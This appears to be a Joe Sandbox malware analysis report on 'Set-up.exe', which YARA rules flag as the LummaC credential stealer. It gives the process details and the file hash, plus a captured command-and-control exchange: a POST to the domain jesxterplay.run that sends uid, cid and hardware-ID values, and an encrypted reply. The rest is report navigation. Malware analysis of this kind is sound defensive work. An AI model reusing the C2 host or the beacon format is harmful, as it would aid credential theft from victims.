2025-04-13 18:22:54 UTC	266	OUT	POST /tuyhd HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Content-Length: 117 Host: jesxterplay.run
2025-04-13 18:22:54 UTC	117	OUT	Data Raw: 75 69 64 3d 30 35 66 32 34 32 31 62 39 61 32 61 65 64 65 38 30 62 36 37 38 64 32 62 35 63 66 30 63 30 30 31 65 32 30 61 61 38 26 63 69 64 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37 26 68 77 69 64 3d 45 44 45 35 33 45 35 31 30 43 42 38 42 44 39 38 44 45 45 41 41 31 46 37 41 45 34 35 42 33 30 46 Data Ascii: uid=05f2421b9a2aede80b678d2b5cf0c001e20aa8&cid=637b55279021aab33278188cfa638397&hwid=EDE53E510CB8BD98DEEAA1F7AE45B30F
2025-04-13 18:22:54 UTC	785	IN	HTTP/1.1 200 OK Date: Sun, 13 Apr 2025 18:22:54 GMT Content-Type: application/octet-stream Content-Length: 108 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7h0m0nojs1forQ5kCltygWOa%2BX0hoL9IM7o1HoiczNnjirM%2F61VvgpqmfPRWUFHr7uwvqump3nVJfLBJpDbC3qIX1D2dglkqtXQ1xMvF%2FyHq92QWSO9OdqYm5iGI1hb8yZs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 92fcfdd72be731b6-JAX alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=112945&min_rtt=112641&rtt_var=24162&sent=7&recv=8&lost=0&retrans=1&sent_bytes=3406&recv_bytes=1019&delivery_rate=2965&cwnd=252&unsent_bytes=0&cid=1fb4b32aa65f1a92&ts=1073&x=0"
2025-04-13 18:22:54 UTC	108	IN	Data Raw: b6 27 4c a8 d5 b7 27 04 2f 0f c0 f6 b5 23 60 fd 09 86 07 f0 71 4f 19 cf 92 ec 6d f6 b4 07 29 57 ef 82 b3 4e 69 87 12 ea e5 1d 7a 56 a3 45 59 7d 18 32 2f c3 f5 52 0c ae aa 34 9c cc 3b 98 83 ca 73 c9 a0 13 75 f9 fd 11 cb c5 03 11 e4 17 7c 95 e0 74 30 01 75 72 37 8d 6b b5 e2 a2 ad 06 60 48 72 01 e6 6d a4 ec 1d 66 99 d7 cd 2a Data Ascii: 'L'/#`qOm)WNizVEY}2/R4;su\|t0ur7k`Hrmf*

Target ID:	0
Start time:	14:22:30
Start date:	13/04/2025
Path:	C:\Users\user\Desktop\Set-up.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Set-up.exe"
Imagebase:	0x710000
File size:	1'104'384 bytes
MD5 hash:	26E8E71A6A3631D980FE7C98883CFE49
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1578163081.0000000003C33000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000003.1571465846.0000000002BB1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Set-up.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Windows Analysis Report
Set-up.exe